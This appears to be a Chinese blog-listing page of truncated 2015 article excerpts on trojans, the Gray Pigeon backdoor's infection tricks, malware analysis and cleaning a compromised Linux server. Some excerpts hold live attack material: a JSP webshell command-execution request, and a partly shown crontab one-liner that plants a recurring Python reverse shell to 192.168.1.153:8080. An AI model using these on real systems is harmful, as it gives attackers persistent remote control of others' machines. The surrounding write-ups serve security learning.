简介:
灰鸽子木马分为两部分:客户端和服务端。
黑客操控者客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe,然后打开后门。开后门的手段有很多,比如,黑客可以将它与一张图片绑定,诱骗运行;也可以建立一个个人网页,诱骗点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载地点,诱骗用户下载。
运行过程:
G_Server....
分类:
其他好文 时间:
2015-02-26 15:02:01
阅读次数:
340
一、木马病毒背景介绍
a) 特洛伊木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,具备破坏和删除文件、发送密码、记录键盘和攻击等功能,会使用户系统破坏甚至瘫痪。
b) 1986年第一例计算机木马。
二、木马病毒的分类
a) 针对网游的木马病毒
b) 针对网银的木马病毒
c) 针对即时通讯工具的木马病毒
d) 给计算机开后门的木马病毒
e) 推广广告的木马病毒
...
分类:
其他好文 时间:
2015-02-26 15:01:01
阅读次数:
225
一:执行系统命令:无回显执行系统命令:1请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:123456789101112");while((a=in.read(b))!=-1){o...
分类:
Web程序 时间:
2015-02-14 20:01:31
阅读次数:
235
我们经常在代码里面写Debug.Log()调试代码,游戏后门代码.这些代码在发布时无意义的,我们就需要慢慢的删除掉它们(很痛苦),有什么办法让它们在编译的时候并不加入编译代码中呢? 预处理命令..比如游戏准备发布电脑和安卓分别控制角色鼠标移动,双手控制移动并不需要复制两份项目分别开发,可以使用预处理...
分类:
编程语言 时间:
2015-02-09 22:53:53
阅读次数:
262
贴这个呢,有点不好意思,但是也是加分项。1分也是分。这里要做一个简单介绍。这篇报告呢:1、分析的病毒样本是感染型的。但是呢,它同时又是个后门型的,比较有意思。2、这篇也算是代码级的分析,毕竟用了ollydbg嘛,F7跟了,还手动把壳脱了。大牛别笑话我啊。3、我本人倾向于应用。做过三年的CERT的工作...
分类:
其他好文 时间:
2015-02-07 00:32:08
阅读次数:
272
TCP反弹后门//python版本,kali下面测试成功,tcp8080:
(crontab-l;printf"*/5****/usr/bin/python-c‘importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.du..
分类:
其他好文 时间:
2015-02-04 16:57:58
阅读次数:
382
linux服务器被挂马的解决办法(一)现象:服务器网站出现偶尔打不开,并不频繁。在查找原因是使用ssh工具连接会经常断掉,无法开展工作。解决过程:还好使用其他服务器对另一个内网ip进行ssh连接,可以。首先怀疑外网ip所在的网卡问题。如何查看流量过高:1使用ifstatwgethttp://..
分类:
系统相关 时间:
2015-01-06 15:46:29
阅读次数:
1527